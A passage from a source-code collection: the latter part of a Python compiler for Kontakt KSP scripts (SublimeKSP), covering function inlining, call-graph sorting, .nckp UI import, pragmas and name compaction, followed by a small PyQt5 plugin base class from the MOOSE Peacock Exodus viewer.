epilogue = flatten([self.modifyAssignStmt(stmt, parent_toplevel, function_stack, disallow_function_in_rhs=True) for stmt in epilogue])
result = prologue + [node] + epilogue
node.parameters = []
node.using_call_keyword = True
node.is_procedure = True
called_functions.add(node.function_name.identifier)
# if 'call' keyword is used
elif node.using_call_keyword:
result = [node]
# else if we're inlining the function start out with an empty result since the line of invocation itself will be replaced
else:
result = []
if is_inside_init_callback:
# inline any declarations made inside the body of the invoked function (afterwards clear the lists so that they don't get inlined twice)
result = func.global_declaration_statements + func.local_declaration_statements + result
func.local_declaration_statements = []
func.global_declaration_statements = []
# build a substitution dictionary that maps parameters to arguments
name_subst_dict = dict(zip(map(str, func.parameters), node.parameters))
# if the function call is of the format "x := myfunc(...)", then setup the dict up to substitute the result variable of the function by "x"
if assign_stmt_lhs:
name_subst_dict[str(func.return_value)] = assign_stmt_lhs
# also add the mapping from local variable names to their new globally unique counterpart
name_subst_dict.update(func.locals_name_subst_dict)
# apply name substitutions to a copy of the function
func = ASTModifierVarRefSubstituter(name_subst_dict, inlining_function_node=node).modify(func.copy())
# recursively modify each line in the function body and add them to the return value
result = result + flatten([self.modify(line, parent_toplevel=parent_toplevel, function_stack=function_stack + [function_name]) for line in func.lines])
# if this function call is embedded within some expression
if not (assign_stmt_lhs or node.is_procedure):
# if the inlined function body consists of just a single statement on the format: result := <expr> where 'result' is the result variable of the function
if len(result) == 1 and isinstance(result[0], ksp_ast.AssignStmt) and result[0].varref.identifier.identifier == func.return_value.identifier:
return result[0].expression # return the right-hand side of that single assignment
else:
raise ksp_ast.ParseException(node, 'The definition of function %s needs to consist of a single line (eg. "result := <expr>") in order to be used in this context' % function_name)
return result
class ASTModifierTaskfuncFunctionHandler(ASTModifierBase):
def __init__(self, ast):
ASTModifierBase.__init__(self, modify_expressions=False)
self.traverse(ast, parent_taskfunc_function=None)
def modifyCallback(self, node, *args, **kwargs):
return node
def modifyFunctionDef(self, node, parent_taskfunc_function=None, assign_stmt_lhs=None):
''' Add to context info about which taskfunc function we are currently inside '''
ID, BinOp, Integer, VarRef, AssignStmt, FunctionCall = ksp_ast.ID, ksp_ast.BinOp, ksp_ast.Integer, ksp_ast.VarRef, ksp_ast.AssignStmt, ksp_ast.FunctionCall
if not node.is_taskfunc:
return node
if node.return_value:
params = node.parameters + [node.return_value]
else:
params = node.parameters
# build a substitution dictionary that maps parameters to arguments
name_subst_dict = {}
li = node.lexinfo
for i, param in enumerate(params):
frame_offset = i + len(node.taskfunc_declaration_statements) + 1
# replace locally declared 'x' with '%p[$fp + <var_index>'
p_ref = VarRef(li, ID(li, '%p'), [BinOp(li, VarRef(li, ID(li, '$fp')), '+', Integer(li, frame_offset))])
name_subst_dict[str(param)] = p_ref
# apply name substitutions to a copy of the function
func = ASTModifierVarRefSubstituter(name_subst_dict, subscript_addition=False).modify(node)
# add prolog
Pxmax = len(params)
Txmax = len(node.taskfunc_declaration_statements)
Ta = Pxmax + Txmax + 1
line0 = AssignStmt(li, VarRef(li, ID(li, '%p'), [BinOp(li, VarRef(li, ID(li, '$sp')), '-', Integer(li, Ta))]), VarRef(li, ID(li, '$fp')))
line1 = AssignStmt(li, VarRef(li, ID(li, '$fp')), BinOp(li, VarRef(li, ID(li, '$sp')), '-', Integer(li, Ta)))
line2 = AssignStmt(li, VarRef(li, ID(li, '$sp')), VarRef(li, ID(li, '$fp')))
#line2 = AssignStmt(li, VarRef(li, ID(li, '$sp')), BinOp(li, VarRef(li, ID(li, '$fp')), '-', Integer(li, Txmax)))
node.lines.insert(0, line0)
node.lines.insert(1, line1)
node.lines.insert(2, line2)
if 'TCM_DEBUG' in true_conditions:
line3 = FunctionCall(li, function_name=ID(li, 'check_full'), parameters=[], is_procedure=True, using_call_keyword=True)
node.lines.insert(3, line3)
call_graph[node.name.identifier].append('check_full')
called_functions.add('check_full')
# epilogue
line0 = AssignStmt(li, VarRef(li, ID(li, '$sp')), VarRef(li, ID(li, '$fp')))
line1 = AssignStmt(li, VarRef(li, ID(li, '$fp')), VarRef(li, ID(li, '%p'), [VarRef(li, ID(li, '$fp'))]))
line2 = AssignStmt(li, VarRef(li, ID(li, '$sp')), BinOp(li, VarRef(li, ID(li, '$sp')), '+', Integer(li, Ta)))
#line3 = AssignStmt(li, VarRef(li, ID(li, '%tstate.ues'), [VarRef(li, ID(li, '$tx'))]), VarRef(li, ID(li, '$sp')))
node.lines.append(line0)
node.lines.append(line1)
node.lines.append(line2)
node.parameters = []
return func
class ASTModifierFixPrefixesAndFixControlPars(ASTModifierFixPrefixes):
def __init__(self, ast):
ASTModifierFixPrefixes.__init__(self, ast)
def modifyVarRef(self, node, *args, **kwargs):
''' Check that there is not more than one subscript '''
if len(node.subscripts) > 1:
raise ksp_ast.ParseException(node.subscripts[0], 'Too many variable subscripts: %s. A normal array variable can have at most one.' % str(node))
return ASTModifierFixPrefixes.modifyVarRef(self, node, *args, **kwargs)
def modifyFunctionCall(self, node, *args, **kwargs):
result = ASTModifierFixPrefixes.modifyFunctionCall(self, node, *args, **kwargs)
if node.is_procedure:
node = result[0]
else:
node = result
function_name = node.function_name.identifier # shorter name alias
# if it's a builtin function that sets or gets a control par and the first parameter is not an integer ID, but rather a UI variable
if function_name in ksp_builtins.functions and not node.using_call_keyword and \
(function_name.startswith('set_control_par') or function_name.startswith('get_control_par')) and \
len(node.parameters) > 0 and isinstance(node.parameters[0], ksp_ast.VarRef) and str(node.parameters[0].identifier).lower() in ui_variables:
# then wrap the UI variable in a get_ui_id call, eg. myknob is converted into get_ui_id(myknob)
func_call_inner = ksp_ast.FunctionCall(node.lexinfo, ksp_ast.ID(node.parameters[0].lexinfo, 'get_ui_id'), [node.parameters[0]], is_procedure=False)
node = ksp_ast.FunctionCall(node.lexinfo, node.function_name, [func_call_inner] + node.parameters[1:], is_procedure=node.is_procedure)
if node.is_procedure:
return [node]
else:
return node
def mark_used_functions_using_depth_first_traversal(call_graph, start_node=None, visited=None):
''' Make a depth-first traversal of call graph and set the used attribute of functions invoked directly or indirectly from some callback.
The graph is represented by a dictionary where f2 in graph[f1] means that the function with name f1 calls the function with name f2 (the names are strings).'''
if visited is None:
visited = set()
nodes_to_visit = set()
if start_node is None:
nodes_to_visit = set(call_graph[None]) # None represents the source of a normal callback (a callback invoking a function as opposed to a function invoking a function)
else:
if start_node not in visited:
functions[start_node].used = True
visited.add(start_node)
nodes_to_visit = set([x for x in call_graph[start_node] if x is not None])
for n in nodes_to_visit:
mark_used_functions_using_depth_first_traversal(call_graph, n, visited)
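# Example of the expected call-graph shape (None stands for "called from a callback";
# the names are made up):
#   call_graph = {None: ['update_ui'], 'update_ui': ['redraw'], 'redraw': []}
# Traversal from None marks both 'update_ui' and 'redraw' as used via functions[name].used.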
def find_node(start_node, search_node, visited=None, path=None):
if visited is None:
visited = []
path = []
visited.append(start_node)
path = path + [start_node]
if start_node == search_node:
return path
for n in start_node.get_childnodes():
find_node(n, search_node, visited, path)
return path
def find_cycles(graph, ready=None):
# adapted from code at http://neopythonic.blogspot.com/2009/01/detecting-cycles-in-directed-graph.html
if ready is None:
ready = set()
todo = set(graph.keys())
while todo:
node = todo.pop()
stack = [node]
while stack:
top = stack[-1]
for node in graph[top]:
if node in stack:
raise Exception('Recursion detected: ' + '->'.join(map(str, stack + [node])))
if node in todo:
stack.append(node)
todo.remove(node)
break
else:
node = stack.pop()
ready.add(node)
return None
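# Example (made-up graph): find_cycles({'a': ['b'], 'b': ['a']}) raises an exception such as
# "Recursion detected: a->b->a"; an acyclic graph simply returns None.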
def topological_sort(graph):
# copied from here: http://www.logarithmic.net/pfh-files/blog/01208083168/sort.py
count = {}
# TODO: maybe replace None with empty string '' to make sorting easier
#nodes = sorted(graph.keys()) <-- OLD CODE
nodes = ['' if k is None else k for k in graph.keys()]
nodes.sort()
nodes = [None if k == '' else k for k in nodes]
for node in nodes:
count[node] = 0
for node in nodes:
for successor in graph[node]:
count[successor] += 1
ready = [node for node in nodes if count[node] == 0]
result = []
while ready:
node = ready.pop(-1)
result.append(node)
for successor in graph[node]:
count[successor] -= 1
if count[successor] == 0:
ready.append(successor)
return result
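# Example: topological_sort({None: ['a'], 'a': ['b'], 'b': []}) yields [None, 'a', 'b'],
# i.e. callers before callees. The compiler later iterates this in reverse so that
# functions invoked with 'call' are emitted before the code that calls them.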
def compress_variable_name(name):
symbols = 'abcdefghijklmnopqrstuvwxyz012345'
hash = hashlib.new('sha1')
hash.update(name.encode('utf-8'))
return ''.join((symbols[ch & 0x1F] for ch in hash.digest()[:5]))
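# Example: compress_variable_name('$my_counter') returns five characters drawn from the
# 32-symbol alphabet above (taken from the SHA-1 digest, so the exact value depends on the
# name); compact_names() then prepends the original prefix character, giving '$' + hash.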
def default_read_file_func(filepath):
return open(filepath, 'r').read()
def parse_nckp(path):
'''
The prefix list is ordered to match the integer number representing each ui_control:
0. panel
1. button
2. fileselector
3. knob
4. label
5. levelmeter
6. menu
7. slider
8. switch
9. table
10. textedit
11. valueedit
12. waveform
13. wavetable
14. xypad
15. mousearea
'''
prefix = ["$", "$", "$", "$", "$", "$", "$", "$", "$", "%", "@", "$", "$", "$", "?", "$"]
cur_prefix = []
# iterate recursively into the nested data
def search_ui_in_dict_recursively(dictionary):
tree = ""
name = ""
key = 'index'
for k, v in dictionary.items():
if k == key:
cur_prefix.append(prefix[v])
tree = dictionary["value"]["common"]["id"]
yield tree
elif isinstance(v, dict):
for result in search_ui_in_dict_recursively(v):
name = (tree + "_" + result) if tree else result
yield name
elif isinstance(v, list):
for d in v:
for result in search_ui_in_dict_recursively(d):
yield result
with open(path, 'r') as read_file:
data = json.load(read_file, object_pairs_hook=OrderedDict)
ui_controls_names = list(search_ui_in_dict_recursively(data))
# pair the collected prefix to the parsed ui_control names
for i,p in enumerate(ui_controls_names):
yield cur_prefix[i]+p
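# Sketch of the nested .nckp JSON shape this walker assumes (inferred from the lookups
# above, not an authoritative format description): any dict carrying an "index" key (the
# control-type number from the docstring list) also provides ["value"]["common"]["id"]
# with the control name; nested controls get their parents' names joined with '_' and the
# matching sigil from `prefix` is recorded alongside each yielded name.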
def open_nckp(lines, basedir):
source = merge_lines(lines) # for checking purposes
nckp_path = '' # predeclared to avoid errors if the import_nckp ksp function is not used
ui_to_import = []
for index, l in enumerate(lines):
line = l.command
if 'import_nckp' in line:
if 'load_performance_view' in source:
if 'make_perfview' in source:
raise ParseException(Line(line, [(None, index + 1)], None), 'If \'load_performance_view\' is used \'make_perfview\' is not necessary, please remove it!\n')
nckp_path = line[line.find('(')+1:line.find(')')][1:-1]
if nckp_path:
# normalize the extracted path so that it works on Mac if it has backward slashes
nckp_path = nckp_path.replace("\\", "/")
# check if the path is relative or not
if not os.path.isabs(nckp_path):
nckp_path = os.path.join(basedir, nckp_path)
if os.path.exists(nckp_path):
ui_to_import = list(parse_nckp(nckp_path))
if not ui_to_import:
raise ParseException(Line(line, [(None, index + 1)], None), 'no controls to import from the nckp file!\n')
for i,v in enumerate(ui_to_import):
variables.add(v.lower())
ui_variables.add(v.lower())
comp_extras.add_nckp_var_to_nckp_table(v)
# Support the use of '.' variables in the compiler to reference controls with double underscores
variables.add(v.lower().replace('__', '.'))
ui_variables.add(v.lower().replace('__', '.'))
comp_extras.add_nckp_var_to_nckp_table(v.replace('__', '.'))
else:
raise ParseException(Line(line, [(None, index + 1)], None), '.nckp file not found at: <' + os.path.abspath(nckp_path) + '> !\n')
else:
raise ParseException(Line(line, [(None, index + 1)], None), 'import_nckp used but no load_performance_view found in the script!\n')
return bool(ui_to_import)
def strip_import_nckp_function_from_source(lines):
for line_obj in lines:
line = line_obj.command
ls_line = line.lstrip()
if 'import_nckp' in ls_line:
line_obj.command = re.sub(r'[^\r\n]', '', ls_line)
class KSPCompiler(object):
def __init__(self, source, basedir, compact=True, compactVars=False, comments_on_expansion=True, read_file_func=default_read_file_func, extra_syntax_checks=False, optimize=False, check_empty_compound_statements=False, add_compiled_date_comment=False):
self.source = source
self.basedir = basedir
self.compact = compact
self.compactVars = compactVars
self.comments_on_expansion = comments_on_expansion
self.read_file_func = read_file_func
self.optimize = optimize
self.check_empty_compound_statements = check_empty_compound_statements
self.add_compiled_date_comment = add_compiled_date_comment
self.extra_syntax_checks = extra_syntax_checks or optimize
self.abort_requested = False
self.lines = []
self.macros = []
self.module = None
self.original2short = {}
self.short2original = {}
self.output_file = None
self.variable_names_to_preserve = set()
def do_imports_and_convert_to_line_objects(self):
# Import files
self.lines = parse_lines_and_handle_imports(self.source,
read_file_function=self.read_file_func,
preprocessor_func=self.examine_pragmas)
handle_conditional_lines(self.lines) # Parse conditionals and remove lines if appropriate
# PAST THIS FUNCTION, ALL IMPORTED AND UPDATED CODE LIVES IN SELF.LINES, NOT SOURCE. DO NOT ATTEMPT TO REPRODUCE LINE OBJECTS FROM SOURCE
# TO PRESERVE LINE PROPERTIES, SELF.LINES CAN NOT BE REMERGED INTO SOURCE
def extensions_with_macros(self):
check_lines = [copy.copy(l) for l in self.lines]
for line in check_lines:
line.replace_placeholders()
check_source = merge_lines(check_lines) # only for checking purposes, not for reproducing lines
### Extensions ###
# Add tcm code if tcm.init() is found
if re.search(r'(?m)^\s*tcm.init', check_source):
self.lines += parse_lines_and_handle_imports(taskfunc_code,
read_file_function=self.read_file_func,
preprocessor_func=self.examine_pragmas)
# Add logger code if activate_logger is found.
m = re.search(r"(?m)^\s*activate_logger.*\)", check_source)
if m:
# Preparing a new source block to add called amended_logger_code
amended_logger_code = logger_code
new_comment_re = r'(?<!["\'])\/\/.*' # this is a single line new comment type //
activate_line = m.group(0).strip()
activate_line = re.sub(new_comment_re, '', activate_line)
filepath_m = re.search(r"(\"|\').*(\"|\')", str(activate_line))
if not filepath_m:
raise ParseException(Line("", [(None, 1)], None), 'No filepath in activate_logger.\n')
filepath_m_string = filepath_m.group(0)
quote_type_str = filepath_m_string[0]
filepath = filepath_m.group(0)[1:-1]
valid_file_path_flag = False
if re.search(r"(?m)^(?:\w:)?(\/[a-zA-Z_\-\s0-9\.]+)*\.nka$", filepath):
valid_file_path_flag = True
m = re.search(r"/[^/]*.nka", filepath)
filename = "_" + m.group(0).replace("/", "").replace(".nka", "").replace("-", "")
filename = re.sub(r"\s", "", filename)
amended_logger_code = amended_logger_code.replace("#name#", filename)
if re.search(r"(?m)^(?:\w:)?(\/[a-zA-Z_\-\s0-9\.]+)*\/$", filepath):
valid_file_path_flag = True
new_logger_str = "logger_filepath := filepath & %slogger.nka%s" % (quote_type_str, quote_type_str)
amended_logger_code = amended_logger_code.replace("#name#", "logger").replace("logger_filepath := filepath", new_logger_str)
if not valid_file_path_flag:
raise ParseException(Line("", [(None, 1)], None), 'Filepath of activate_logger is invalid.\nFilepaths must be in this format: "C:/Users/Name/LogFile.nka" or "/Users/Name/LogFile.nka"')
# A persistance_changed callback function needs to be inserted if the script has one.
# Insert *directly* into self.lines if there is, or just add it to the new source block if there isn't.
pccb_start = -1
for i in range(0, len(self.lines)):
content = self.lines[i].command
m = re.search(r"(?m)^\s*on\s+persistence_changed", content)
if m:
pccb_start = i
break
if pccb_start != -1:
pccb_end = -1
for i in range(pccb_start, len(self.lines)):
content = self.lines[i].command
if "end on" in content:
pccb_end = i
break
insert_function_line_obj = parse_lines_and_handle_imports("checkPrintFlag()",
read_file_function=self.read_file_func,
preprocessor_func=self.examine_pragmas)
replace_lines = collections.deque([])
for i in range(0, len(self.lines)):
if i == pccb_end:
replace_lines.append(insert_function_line_obj[0])
replace_lines.append(self.lines[i])
self.lines = replace_lines
else:
# if there is no persistence_changed callback then generate one
amended_logger_code = amended_logger_code + "\non persistence_changed\ncheckPrintFlag()\nend on\n"
self.lines += parse_lines_and_handle_imports(amended_logger_code,
read_file_function=self.read_file_func,
preprocessor_func=self.examine_pragmas)
###
# Run conditional stage a second time to catch the new source additions.
handle_conditional_lines(self.lines)
def search_for_nckp(self):
# Import nckp if import_nckp() found
if open_nckp(self.lines, self.basedir):
strip_import_nckp_function_from_source(self.lines)
###
def replace_string_placeholders(self):
for line in self.lines:
line.replace_placeholders()
# NOTE(Sam): Previously done in the expand_macros function, the lines are converted into a block separately
# because the preprocessor needs to be called after the macros and before this.
def convert_lines_to_code(self):
self.code = merge_lines(self.lines)
# Isolate macros into objects, removing from code
def extract_macros(self):
self.lines, self.macros = extract_macros(self.lines)
# Run stored macros on the code
def expand_macros(self):
# Initial Expansion
normal_lines, callback_lines = expand_macros(self.lines, self.macros)
self.lines = normal_lines + callback_lines
# Nested Expansion
while macro_iter_functions(self.lines):
normal_lines, callback_lines = expand_macros(self.lines, self.macros)
self.lines = normal_lines + callback_lines
def examine_pragmas(self, code, namespaces):
# find info about output file
pragma_re = re.compile(r'\{ ?\#pragma\s+save_compiled_source\s+(.*)\}')
m = pragma_re.search(code)
if m:
dir_check = m.group(1)
if not os.path.isabs(dir_check):
if self.basedir is None:
raise Exception('Please save the file being compiled before attempting to compile to a relative path.')
dir_check = os.path.join(self.basedir, dir_check)
if not os.path.exists(os.path.dirname(dir_check)):
raise Exception('The filepath in save_compiled_source does not exist!')
else:
self.output_file = dir_check
# find info about which variable names not to compact
pragma_re = re.compile(r'\{ ?\#pragma\s+preserve_names\s+(.*?)\s*\}')
for m in pragma_re.finditer(code):
names = re.sub(r'[$!%@?~]', '', m.group(1)) # remove any prefixes
for variable_name_pattern in re.split(r'\s+,?\s*|\s*,\s+|,', names):
if len(variable_name_pattern) == 0:
continue
if namespaces:
variable_name_pattern = '__'.join(namespaces + [variable_name_pattern])
variable_name_pattern = variable_name_pattern.replace('.', '__').replace('*', '.*')
self.variable_names_to_preserve.add(variable_name_pattern)
return code
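# Pragma lines recognised by the regexes above, for reference:
#   { #pragma save_compiled_source compiled/output.txt }
#   { #pragma preserve_names my_var, ui_* }
# ('*' acts as a wildcard; '.' in a preserved name is treated as the internal '__' form.)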
def parse_code(self):
self.module = parse(self.code)
def sort_functions_and_insert_local_variables_into_on_init(self):
# make sure that a function used from a callback also marks the functions it calls (directly or indirectly) as used
used_functions = set()
mark_used_functions_using_depth_first_traversal(call_graph, visited=used_functions)
# check that there is no recursion among functions invoked using 'call'
find_cycles(call_graph)
# make a topological sorting of the call graph and keep only the used functions that are invoked using 'call'
function_definition_order = [function_name
for function_name in reversed(topological_sort(call_graph))
if function_name in called_functions and function_name in used_functions]
# create a lookup table from function name to function definition, remove all function definitions and then add the ones used back in the right order (as determined by the topological sorting)
function_table = dict([(func.name.identifier, func) for func in self.module.blocks if isinstance(func, ksp_ast.FunctionDef)])
self.module.blocks = [block for block in self.module.blocks if not isinstance(block, ksp_ast.FunctionDef)]
self.module.blocks = [self.module.on_init] + [function_table[func_name] for func_name in function_definition_order] + self.module.blocks[1:]
# add local variable declarations to 'on init' in case they have not already been inserted (they could have been inserted earlier if the function was invoked from the init callback)
for f in reversed(list(functions.values())):
if f.used and (f.global_declaration_statements or f.local_declaration_statements):
self.module.on_init.lines = f.global_declaration_statements + self.module.on_init.lines + f.local_declaration_statements
f.global_declaration_statements = []
f.local_declaration_statements = []
def convert_dots_to_double_underscore(self):
global variables
# convert all dots into '__' (and update the list of variables accordingly)
# Note: for historical reasons the ksp_compiler_extras functions assume
# pure KSP as input and therefore cannot handle '.' in names.
# update the AST
name_fixer = ASTModifierNameFixer(self.module)
# update the global list of variables similarly
variables = set(name_fixer.replace_dots_in_name(v) for v in variables)
def compact_names(self):
global variables
# build regular expression that can later tell which names to preserve (these should not undergo compaction)
preserve_pattern = re.compile(r'[$%@!?~]?(' + '|'.join(self.variable_names_to_preserve) + ')$', re.I)
for v in variables:
if self.variable_names_to_preserve and preserve_pattern.match(v):
#self.original2short[v] = v
#self.short2original[v] = v
continue
elif v not in self.original2short and v not in ksp_builtins.variables:
self.original2short[v] = '%s%s' % (v[0], compress_variable_name(v))
if self.original2short[v] in ksp_builtins.variables:
raise Exception('This is your unlucky day. Even though the chance is only 3.2%%, the variable %s was mapped to the same hash as that of a builtin KSP variable.' % (v))
if self.original2short[v] in self.short2original:
raise Exception('This is your unlucky day. Even though the chance is only 3.2%%, two variable names were compacted to the same short name: %s and %s' % (v, self.short2original[self.original2short[v]]))
self.short2original[self.original2short[v]] = v
ASTModifierIDSubstituter(self.original2short, force_lower_case=True).modify(self.module)
def init_extra_syntax_checks(self):
comp_extras.clear_symbol_table()
self.used_variables = set()
def generate_compiled_code(self):
buffer = StringIO()
emitter = ksp_ast.Emitter(buffer, compact=self.compact)
self.module.emit(emitter)
self.compiled_code = buffer.getvalue()
# NOTE(Sam): Add a ksp comment at the beginning of the compiled script to display the time and date it was compiled on
if self.add_compiled_date_comment:
localtime = time.asctime( time.localtime(time.time()) )
self.compiled_code = "{ Compiled on " + localtime + " }\n" + self.compiled_code
def uncompress_variable_names(self, compiled_code):
def sub_func(match_obj):
s = match_obj.group(0)
if s in self.short2original:
return self.short2original[s]
else:
return s
return varname_re.sub(sub_func, compiled_code)
def compile(self, callback=None):
global variables
init_globals()
try:
used_functions = set()
used_variables = set()
do_extra = self.extra_syntax_checks
do_optim = do_extra and self.optimize
do_emptycheck = self.check_empty_compound_statements and not do_optim
# (description, function, condition, time-weight)
tasks = [
('scanning and importing code', lambda: self.do_imports_and_convert_to_line_objects(), True, 1),
('extensions (w/ macros)', lambda: self.extensions_with_macros(), True, 1),
# NOTE(Sam): Call the pre-macro section of the preprocessor
('pre-macro processes', lambda: pre_macro_functions(self.lines), True, 1),
('parsing macros', lambda: self.extract_macros(), True, 1),
('expanding macros', lambda: self.expand_macros(), True, 1),
# NOTE(Sam): Call the post-macro section of the preprocessor
('post-macro processes', lambda: post_macro_functions(self.lines), True, 1),
('replace string placeholders', lambda: self.replace_string_placeholders(), True, 1),
('search for nckp import', lambda: self.search_for_nckp(), True, 1),
# NOTE(Sam): Convert the lines to a block in a separate function
('convert lines to code block', lambda: self.convert_lines_to_code(), True, 1),
('parse code', lambda: self.parse_code(), True, 1),
('various tasks', lambda: ASTModifierFixReferencesAndFamilies(self.module, self.lines), True, 1),
('add variable name prefixes', lambda: ASTModifierFixPrefixesIncludingLocalVars(self.module), True, 1),
('inline functions', lambda: ASTModifierFunctionExpander(self.module), True, 1),
('handle taskfunc', lambda: ASTModifierTaskfuncFunctionHandler(self.module), True, 1),
('handle local variables', lambda: self.sort_functions_and_insert_local_variables_into_on_init(), True, 1),
('add variable name prefixes', lambda: ASTModifierFixPrefixesAndFixControlPars(self.module), True, 1),
('convert dots to underscore', lambda: self.convert_dots_to_double_underscore(), True, 1),
('init extra syntax checks', lambda: self.init_extra_syntax_checks(), do_extra, 1),
('check types', lambda: comp_extras.ASTVisitorDetermineExpressionTypes(self.module), do_extra, 1),
('check types', lambda: comp_extras.ASTVisitorCheckStatementExprTypes(self.module), do_extra, 1),
('check declarations', lambda: comp_extras.ASTVisitorCheckDeclarations(self.module), do_extra, 1),
('simplying expressions', lambda: comp_extras.ASTModifierSimplifyExpressions(self.module, True), do_optim, 1),
('removing unused branches', lambda: comp_extras.ASTModifierRemoveUnusedBranches(self.module), do_optim, 1),
('removing unused functions', lambda: comp_extras.ASTVisitorFindUsedFunctions(self.module, used_functions), do_optim, 1),
('removing unused functions', lambda: comp_extras.ASTModifierRemoveUnusedFunctions(self.module, used_functions), do_optim, 1),
('removing unused variables', lambda: comp_extras.ASTVisitorFindUsedVariables(self.module, used_variables), do_optim, 1),
('removing unused variables', lambda: comp_extras.ASTModifierRemoveUnusedVariables(self.module, used_variables), do_optim, 1),
('checking empty if-stmts', lambda: comp_extras.ASTVisitorCheckNoEmptyIfCaseStatements(self.module), do_emptycheck, 1),
('compact variable names', self.compact_names, self.compactVars, 1),
('generate code', self.generate_compiled_code, True, 1),
]
# keep only tasks where the execution-condition is true
tasks = [(desc, func, time) for (desc, func, condition, time) in tasks if condition]
total_time = float(sum(t[-1] for t in tasks))
time_so_far = 0
for (desc, func, time) in tasks:
if callback:
callback(desc, 100 * time_so_far/total_time) # parameters are: description, percent done
func()
time_so_far += time
if self.abort_requested:
return False
return True
except ksp_ast.ParseException as e:
#raise # TEMPORARY
messages = []
if isinstance(e.node, lex.LexToken):
line_numbers = [e.node.lineno]
else:
line_numbers = [e.node.lineno] + [n.lineno for n in e.node.lexinfo[2]]
messages = ['%s' % str(e)]
for indent, line_number in enumerate(line_numbers):
line = self.lines[line_number]
message = '\n'.join(messages)
raise ParseException(line, message)
def abort_compilation(self):
self.abort_requested = True
if __name__ == "__main__":
import sys
import os
import os.path
import codecs
import argparse
# definition of argsparse.FileType in Python 3.4 (with support for encoding) - in case we're running Python 3.3
class FileType(object):
def __init__(self, mode='r', bufsize=-1, encoding=None, errors=None):
self._mode = mode
self._bufsize = bufsize
self._encoding = encoding
self._errors = errors
def __call__(self, string):
# the special argument "-" means sys.std{in,out}
if string == '-':
if 'r' in self._mode:
return sys.stdin
elif 'w' in self._mode:
return sys.stdout
else:
msg = _('argument "-" with mode %r') % self._mode
raise ValueError(msg)
# all other arguments are used as file names
try:
return open(string, self._mode, self._bufsize, self._encoding, self._errors)
except OSError as e:
message = _("can't open '%s': %s")
raise ArgumentTypeError(message % (string, e))
def __repr__(self):
args = self._mode, self._bufsize
kwargs = [('encoding', self._encoding), ('errors', self._errors)]
args_str = ', '.join([repr(arg) for arg in args if arg != -1] +
['%s=%r' % (kw, arg) for kw, arg in kwargs
if arg is not None])
return '%s(%s)' % (type(self).__name__, args_str)
# parse command line arguments
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--compact', dest='compact', action='store_true', default=False, help='Minimize whitespace in compiled code')
arg_parser.add_argument('--compact_variables', dest='compact_variables', action='store_true', default=False, help='Shorten and obfuscate variable names')
arg_parser.add_argument('--extra_syntax_checks', dest='extra_syntax_checks', action='store_true', default=False, help='Additional syntax checks')
arg_parser.add_argument('--optimize', dest='optimize', action='store_true', default=False, help='Optimize the generated code')
arg_parser.add_argument('--nocompiledate', dest='nocompiledate', action='store_true', default=False, help='Do not add the compilation date comment to the output')
arg_parser.add_argument('source_file', type=FileType('r', encoding='latin-1'))
arg_parser.add_argument('output_file', type=FileType('w', encoding='latin-1'), nargs='?')
args = arg_parser.parse_args()
# determine the base directory of the source file
if args.source_file.name != '<stdin>':
basedir = os.path.dirname(args.source_file.name)
else:
basedir = None
# function for reading imported modules
def read_file_func(filepath):
if not os.path.isabs(filepath):
if basedir is None:
raise Exception('Relative import paths not supported when the base path of the source file is unknown')
else:
filepath = os.path.join(basedir, filepath)
return codecs.open(filepath, 'r', 'latin-1').read()
# make sure that extra syntax checks are enabled if --optimize argument is used
if args.optimize and not args.extra_syntax_checks:
args.extra_syntax_checks = True
# read the source and compile it
code = args.source_file.read()
compiler = KSPCompiler(
code,
basedir,
compact=args.compact,
compactVars=args.compact_variables,
comments_on_expansion=False,
read_file_func=read_file_func,
extra_syntax_checks=args.extra_syntax_checks,
optimize=args.optimize,
check_empty_compound_statements=False,
add_compiled_date_comment=(not args.nocompiledate))
compiler.compile()
# write the compiled code to output
code = compiler.compiled_code.replace('\r', '')
output = args.output_file
if output is None:
output_path = compiler.output_file
if not os.path.isabs(output_path):
output_path = os.path.join(basedir, output_path)
output = codecs.open(output_path, 'w', encoding='latin-1')
if output:
output.write(code)
|
nojanath/SublimeKSP
|
ksp_compiler3/ksp_compiler.py
|
Python
|
gpl-3.0
| 105,491
|
[
"VisIt"
] |
528c11f6503241a36b3e84487e33ba0df729c92ed674ba310f7d48c36bea2dd8
|
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
import peacock
from PyQt5 import QtWidgets
class ExodusPlugin(peacock.base.Plugin):
"""
Plugin class for the Exodus volume rendering portion of Peacock.
"""
def __init__(self, layout='LeftLayout', settings_key="", **kwargs):
super(ExodusPlugin, self).__init__(layout=layout, settings_key=settings_key, **kwargs)
self.setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.MinimumExpanding)
# Ubiquitous member variables
self._filename = None
self._variable = None
self._component = -1
self.setEnabled(False)
def onPlayStart(self):
"""
Disables the plugin when playing begins.
"""
self.setEnabled(False)
def onPlayStop(self):
"""
Enables widget when the playing stops.
"""
self.setEnabled(True)
def onSetFilename(self, filename):
"""
Stores the current filename. (see FilePlugin)
"""
self._filename = str(filename) if filename else None
self._loadPlugin()
self.updateOptions()
def onSetVariable(self, variable):
"""
Stores the current variable. (see FilePlugin)
"""
self._variable = str(variable) if variable else None
self._loadPlugin()
self.updateOptions()
def onSetComponent(self, component):
"""
Stores the current variable component. (see FilePlugin)
"""
self._component = component if (component is not None) else -1
self._loadPlugin()
self.updateOptions()
def onCurrentChanged(self, index):
"""
Called by ExodusViewer when the tab is changed.
"""
pass
def onSetEnableWidget(self, value):
"""
Enables/disables the widget after the VTKRenderWindow is created or destroyed.
"""
self.setEnabled(value)
def stateKey(self):
"""
Generates a (mostly) unique key for use in saving state of a widget.
"""
return (self._filename, self._variable, self._component)
def setup(self):
"""
Setup the Exodus widgets with a uniform margins and "flat" style.
"""
super(ExodusPlugin, self).setup()
if hasattr(self, 'MainLayout'):
self.MainLayout.setContentsMargins(5,5,5,5)
self.MainLayout.setSpacing(5)
if isinstance(self, QtWidgets.QGroupBox):
self.setFlat(True)
def _loadPlugin(self):
"""
This is called by onSetFilename/Variable/Component, use it to load the plugin state.
"""
pass
def updateOptions(self):
"""
All options for the Reader/Result/Window objects should be set for the plugin by this method.
"""
pass
|
nuclear-wizard/moose
|
python/peacock/ExodusViewer/plugins/ExodusPlugin.py
|
Python
|
lgpl-2.1
| 3,108
|
[
"MOOSE"
] |
